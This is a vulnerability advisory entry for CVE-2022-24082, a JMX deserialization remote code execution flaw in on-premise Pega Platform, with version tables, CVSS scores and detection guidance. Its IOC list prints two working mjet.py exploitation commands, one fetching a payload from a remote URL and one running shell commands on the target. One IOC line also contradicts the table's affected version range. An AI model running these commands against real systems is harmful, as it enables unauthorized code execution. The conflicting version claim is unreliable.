CVE-2022-24082
Published 2022-07-19
Priority: P268 | critical | 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 9.48% (94.8th percentile)
If an on-premise installation of the Pega Platform is configured with the port for the JMX interface exposed to the Internet and port filtering is not properly configured, then it may be possible to upload serialized payloads to attack the underlying system. This does not affect systems running on PegaCloud due to its design and architecture.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pega | infinity | >= 8.1.0 < 8.7.3 | 8.7.3 |
| pegasystems | pega_infinity | >= 8.1.0 < unspecified | unspecified |
| pegasystems | pega_infinity | >= unspecified < 8.7.3 | 8.7.3 |
Detection & IOCs
- Command: `java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass 9999 install random_password http://:6666 6666`
- Command: `java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass 9999 command random_password "id;ifconfig"`
- Scan for exposed JMX/RMI registry on TCP port 9999; unexpected external exposure of this port on Pega Platform on-premise installations is a strong indicator of attack surface for CVE-2022-24082.
- Monitor for use of MOGWAI LABS JMX Exploitation Toolkit (mjet.py) with the `--localhost_bypass` flag targeting port 9999, which is the exploitation method for this CVE.
- Alert on inbound serialized payload uploads to the JMX interface; the vulnerability is triggered by uploading serialized payloads to the exposed JMX port.
- Detect dynamic RMI TCP port probing following an initial RMI registry dump; attackers extract the dynamic port from the RMI dump and then probe it directly.
- Presence of jython-standalone-2.7.2.jar on a host alongside mjet.py is indicative of JMX exploitation tooling associated with this CVE.
- This vulnerability only affects on-premise Pega Platform installations where the JMX interface port is exposed to the Internet without proper port filtering; PegaCloud deployments are not affected.
- Affected version range is Pega Platform 8.1.0 on-premise and higher, up to 8.3.7; systems outside this range or properly firewalled are not directly exploitable.
- Exploitation requires the JMX port to be reachable from the attacker; the RMI dump reports 127.0.0.1 but the service actually listens on the network interface, which may cause defenders to underestimate exposure.
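CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |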
References
- http://packetstormsecurity.com/files/169480/Pega-Platform-8.7.3-Remote-Code-Execution.html
- https://support.pega.com/support-doc/pega-security-advisory-b22-vulnerability-%E2%80%93-hotfix-matrix-0